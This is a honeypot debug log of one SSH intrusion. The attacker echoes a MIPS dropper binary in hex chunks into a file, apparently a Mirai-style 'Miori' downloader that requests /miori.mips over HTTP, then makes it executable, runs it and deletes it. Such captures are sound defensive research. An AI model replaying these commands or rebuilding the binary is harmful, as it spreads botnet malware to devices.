2022-10-22 20:51:31.946 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,49,92,120,50,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,48,48,92,120,56,48,92,120,49,48,92,120,50,49,92,120,48,48,92,120,97,48,92,120,50,48,92,120,50,49,92,120,48,48,92,120,99,48,92,120,50,56,92,120,50,49,92,120,48,48,92,120,101,48,92,120,51,48,92,120,50,49,92,120,56,102,92,120,97,55,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.946 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x8f\xa8\x00\x14\x8f\xa9\x00\x18\x8f\xaa\x00\x1c\x27\xbd\xff\xe0\xaf\xa8\x00\x10\xaf\xa9\x00\x14\xaf\xaa\x00\x18\xaf\xa2\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.948 - [Debug] [SHELL] line from reader: echo -ne "\x10\x8f\xa8\x00\x14\x8f\xa9\x00\x18\x8f\xaa\x00\x1c\x27\xbd\xff\xe0\xaf\xa8\x00\x10\xaf\xa9\x00\x14\xaf\xaa\x00\x18\xaf\xa2\x00" >> gay
2022-10-22 20:51:31.948 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,56,102,92,120,97,56,92,120,48,48,92,120,49,52,92,120,56,102,92,120,97,57,92,120,48,48,92,120,49,56,92,120,56,102,92,120,97,97,92,120,48,48,92,120,49,99,92,120,50,55,92,120,98,100,92,120,102,102,92,120,101,48,92,120,97,102,92,120,97,56,92,120,48,48,92,120,49,48,92,120,97,102,92,120,97,57,92,120,48,48,92,120,49,52,92,120,97,102,92,120,97,97,92,120,48,48,92,120,49,56,92,120,97,102,92,120,97,50,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.949 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x1c\x8f\xa2\x00\x1c\x00\x00\x00\x0c\x14\xe0\x00\x03\x27\xbd\x00\x20\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x40\x20\x21\x8f\x99\x80"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.950 - [Debug] [SHELL] line from reader: echo -ne "\x1c\x8f\xa2\x00\x1c\x00\x00\x00\x0c\x14\xe0\x00\x03\x27\xbd\x00\x20\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x40\x20\x21\x8f\x99\x80" >> gay
2022-10-22 20:51:31.950 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,99,92,120,56,102,92,120,97,50,92,120,48,48,92,120,49,99,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,99,92,120,49,52,92,120,101,48,92,120,48,48,92,120,48,51,92,120,50,55,92,120,98,100,92,120,48,48,92,120,50,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,48,92,120,50,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.950 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x40\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x80\xb0\x03\x99\xe0\x21\x27\xbd\xff"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.952 - [Debug] [SHELL] line from reader: echo -ne "\x40\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x80\xb0\x03\x99\xe0\x21\x27\xbd\xff" >> gay
2022-10-22 20:51:31.952 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,52,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,48,92,120,98,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,50,55,92,120,98,100,92,120,102,102,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.952 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xe0\xaf\xbf\x00\x1c\xaf\xb0\x00\x18\xaf\xbc\x00\x10\x8f\x99\x80\x34\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x80\x80\x21\x8f\xbc\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.955 - [Debug] [SHELL] line from reader: echo -ne "\xe0\xaf\xbf\x00\x1c\xaf\xb0\x00\x18\xaf\xbc\x00\x10\x8f\x99\x80\x34\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x80\x80\x21\x8f\xbc\x00" >> gay
2022-10-22 20:51:31.955 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,101,48,92,120,97,102,92,120,98,102,92,120,48,48,92,120,49,99,92,120,97,102,92,120,98,48,92,120,48,48,92,120,49,56,92,120,97,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,51,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,48,92,120,56,48,92,120,56,48,92,120,50,49,92,120,56,102,92,120,98,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.955 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\xac\x50\x00\x00\x8f\xbf\x00\x1c\x8f\xb0\x00\x18\x24\x02\xff\xff\x03\xe0\x00\x08\x27\xbd\x00\x20\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.956 - [Debug] [SHELL] line from reader: echo -ne "\x10\xac\x50\x00\x00\x8f\xbf\x00\x1c\x8f\xb0\x00\x18\x24\x02\xff\xff\x03\xe0\x00\x08\x27\xbd\x00\x20\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.956 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,97,99,92,120,53,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,98,102,92,120,48,48,92,120,49,99,92,120,56,102,92,120,98,48,92,120,48,48,92,120,49,56,92,120,50,52,92,120,48,50,92,120,102,102,92,120,102,102,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,50,55,92,120,98,100,92,120,48,48,92,120,50,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.957 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x3c\x1c\x00\x05\x27\x9c\x80\x60\x03\x99\xe0\x21\x8f\x82\x80\x30\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.958 - [Debug] [SHELL] line from reader: echo -ne "\x00\x3c\x1c\x00\x05\x27\x9c\x80\x60\x03\x99\xe0\x21\x8f\x82\x80\x30\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.959 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,48,92,120,54,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,56,102,92,120,56,50,92,120,56,48,92,120,51,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.959 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x6d\x69\x70\x73\x00\x00\x00\x00\x4d\x49\x4f\x52\x49\x0a\x00\x00\x73\x73\x68\x64\x64\x6e\x69\x67\x00\x00\x00\x00\x47\x41\x46"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.960 - [Debug] [SHELL] line from reader: echo -ne "\x00\x6d\x69\x70\x73\x00\x00\x00\x00\x4d\x49\x4f\x52\x49\x0a\x00\x00\x73\x73\x68\x64\x64\x6e\x69\x67\x00\x00\x00\x00\x47\x41\x46" >> gay
2022-10-22 20:51:31.960 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,54,100,92,120,54,57,92,120,55,48,92,120,55,51,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,100,92,120,52,57,92,120,52,102,92,120,53,50,92,120,52,57,92,120,48,97,92,120,48,48,92,120,48,48,92,120,55,51,92,120,55,51,92,120,54,56,92,120,54,52,92,120,54,52,92,120,54,101,92,120,54,57,92,120,54,55,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,55,92,120,52,49,92,120,52,54,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.960 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x6d\x69\x6f\x72\x69\x2e\x6d\x69\x70\x73\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.962 - [Debug] [SHELL] line from reader: echo -ne "\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x6d\x69\x6f\x72\x69\x2e\x6d\x69\x70\x73\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d" >> gay
2022-10-22 20:51:31.962 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,97,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,55,92,120,52,53,92,120,53,52,92,120,50,48,92,120,50,102,92,120,54,100,92,120,54,57,92,120,54,102,92,120,55,50,92,120,54,57,92,120,50,101,92,120,54,100,92,120,54,57,92,120,55,48,92,120,55,51,92,120,50,48,92,120,52,56,92,120,53,52,92,120,53,52,92,120,53,48,92,120,50,102,92,120,51,49,92,120,50,101,92,120,51,48,92,120,48,100,92,120,48,97,92,120,48,100,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.962 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x0a\x00\x00\x00\x00\x42\x41\x47\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.964 - [Debug] [SHELL] line from reader: echo -ne "\x0a\x00\x00\x00\x00\x42\x41\x47\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.964 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,97,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,50,92,120,52,49,92,120,52,55,92,120,48,97,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.964 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x06\x90\x00\x40\x05\xc0\x00\x40\x01\x9c\x00\x40\x02"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.966 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x06\x90\x00\x40\x05\xc0\x00\x40\x01\x9c\x00\x40\x02" >> gay
2022-10-22 20:51:31.966 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,52,92,120,48,54,92,120,57,48,92,120,48,48,92,120,52,48,92,120,48,53,92,120,99,48,92,120,48,48,92,120,52,48,92,120,48,49,92,120,57,99,92,120,48,48,92,120,52,48,92,120,48,50,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.967 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x00\x40\x05\x70\x00\x40\x01\x28\x00\x40\x01\x74\x00\x40\x00\xa0\x00\x40\x01\xc4\x00\x40\x00\xc8\x00\x40\x00\xe4\x00\x40\x05"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.968 - [Debug] [SHELL] line from reader: echo -ne "\x10\x00\x40\x05\x70\x00\x40\x01\x28\x00\x40\x01\x74\x00\x40\x00\xa0\x00\x40\x01\xc4\x00\x40\x00\xc8\x00\x40\x00\xe4\x00\x40\x05" >> gay
2022-10-22 20:51:31.968 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,48,48,92,120,52,48,92,120,48,53,92,120,55,48,92,120,48,48,92,120,52,48,92,120,48,49,92,120,50,56,92,120,48,48,92,120,52,48,92,120,48,49,92,120,55,52,92,120,48,48,92,120,52,48,92,120,48,48,92,120,97,48,92,120,48,48,92,120,52,48,92,120,48,49,92,120,99,52,92,120,48,48,92,120,52,48,92,120,48,48,92,120,99,56,92,120,48,48,92,120,52,48,92,120,48,48,92,120,101,52,92,120,48,48,92,120,52,48,92,120,48,53,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.968 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x40\x01\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x67"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.970 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x40\x01\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x67" >> gay
2022-10-22 20:51:31.970 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,52,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,50,101,92,120,55,51,92,120,54,56,92,120,55,51,92,120,55,52,92,120,55,50,92,120,55,52,92,120,54,49,92,120,54,50,92,120,48,48,92,120,50,101,92,120,55,52,92,120,54,53,92,120,55,56,92,120,55,52,92,120,48,48,92,120,50,101,92,120,55,50,92,120,54,102,92,120,54,52,92,120,54,49,92,120,55,52,92,120,54,49,92,120,48,48,92,120,50,101,92,120,54,55,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.970 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x6f\x74\x00\x2e\x62\x73\x73\x00\x2e\x6d\x64\x65\x62\x75\x67\x2e\x61\x62\x69\x33\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.972 - [Debug] [SHELL] line from reader: echo -ne "\x6f\x74\x00\x2e\x62\x73\x73\x00\x2e\x6d\x64\x65\x62\x75\x67\x2e\x61\x62\x69\x33\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.972 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,54,102,92,120,55,52,92,120,48,48,92,120,50,101,92,120,54,50,92,120,55,51,92,120,55,51,92,120,48,48,92,120,50,101,92,120,54,100,92,120,54,52,92,120,54,53,92,120,54,50,92,120,55,53,92,120,54,55,92,120,50,101,92,120,54,49,92,120,54,50,92,120,54,57,92,120,51,51,92,120,51,50,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.972 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.973 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.973 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.973 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x40\x00\xa0\x00\x00\x00\xa0\x00\x00\x05\x40\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.975 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x40\x00\xa0\x00\x00\x00\xa0\x00\x00\x05\x40\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.975 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,98,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,48,48,92,120,52,48,92,120,48,48,92,120,97,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,97,48,92,120,48,48,92,120,48,48,92,120,48,53,92,120,52,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.982 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x40\x05\xe0\x00\x00\x05\xe0\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.983 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x40\x05\xe0\x00\x00\x05\xe0\x00\x00\x00" >> gay
2022-10-22 20:51:31.987 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,51,50,92,120,48,48,92,120,52,48,92,120,48,53,92,120,101,48,92,120,48,48,92,120,48,48,92,120,48,53,92,120,101,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.987 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x4c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x01\x10\x00\x00\x03\x00\x44\x06"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.989 - [Debug] [SHELL] line from reader: echo -ne "\x4c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x01\x10\x00\x00\x03\x00\x44\x06" >> gay
2022-10-22 20:51:31.989 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,52,99,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,57,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,48,48,92,120,52,52,92,120,48,54,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.990 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x30\x00\x00\x06\x30\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.992 - [Debug] [SHELL] line from reader: echo -ne "\x30\x00\x00\x06\x30\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00" >> gay
2022-10-22 20:51:31.993 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,51,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,51,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,101,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.993 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x08\x00\x00\x00\x03\x00\x44\x06\x90\x00\x00\x06\x84\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.994 - [Debug] [SHELL] line from reader: echo -ne "\x08\x00\x00\x00\x03\x00\x44\x06\x90\x00\x00\x06\x84\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00" >> gay
2022-10-22 20:51:31.994 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,48,48,92,120,52,52,92,120,48,54,92,120,57,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,56,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.995 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x23\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x06\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.996 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x23\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x06\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.997 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,50,51,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,56,92,120,48,48,92,120,48,48,92,120,48,54,92,120,56,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.997 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x84\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.998 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x84\x00\x00\x00" >> gay
2022-10-22 20:51:31.998 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,56,52,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.999 - [Debug] [SHELL] Attacker Keystroke: chmod[Space]777[Space]gay;./gay[Space];chmod[Space]777[Space]sshddnig;[Space]./sshddnig[Space]ssh.mips.echo;[Space]rm[Space]-rf[Space]gay;[Space]rm[Space]-rf[Space]sshddnig[LF]
2022-10-22 20:51:32.002 - [Debug] [SHELL] line from reader: chmod 777 gay;./gay ;chmod 777 sshddnig; ./sshddnig ssh.mips.echo; rm -rf gay; rm -rf sshddnig
2022-10-22 20:51:32.003 - [Debug] [SHELL] Keystroke buffer: 99,104,109,111,100,32,55,55,55,32,103,97,121,59,46,47,103,97,121,32,59,99,104,109,111,100,32,55,55,55,32,115,115,104,100,100,110,105,103,59,32,46,47,115,115,104,100,100,110,105,103,32,115,115,104,46,109,105,112,115,46,101,99,104,111,59,32,114,109,32,45,114,102,32,103,97,121,59,32,114,109,32,45,114,102,32,115,115,104,100,100,110,105,103,10
2022-10-22 20:52:02.839 - [Debug] [SHELL] Attacker ended the shell
2022-10-22 20:52:03.141 - [Debug] [Connection] Attacker closed connection
2022-10-22 20:52:03.156 - [Debug] [LXC] Container's OpenSSH server ended connection
2022-10-22 20:52:03.156 - [Debug] [LXC] Container's OpenSSH server closed connection
2022-10-22 20:52:03.156 - [Debug] [LXC Streams] Removed Stream | Total streams: 0
2022-10-22 20:52:03.156 - [Debug] [SHELL] Honeypot ended shell
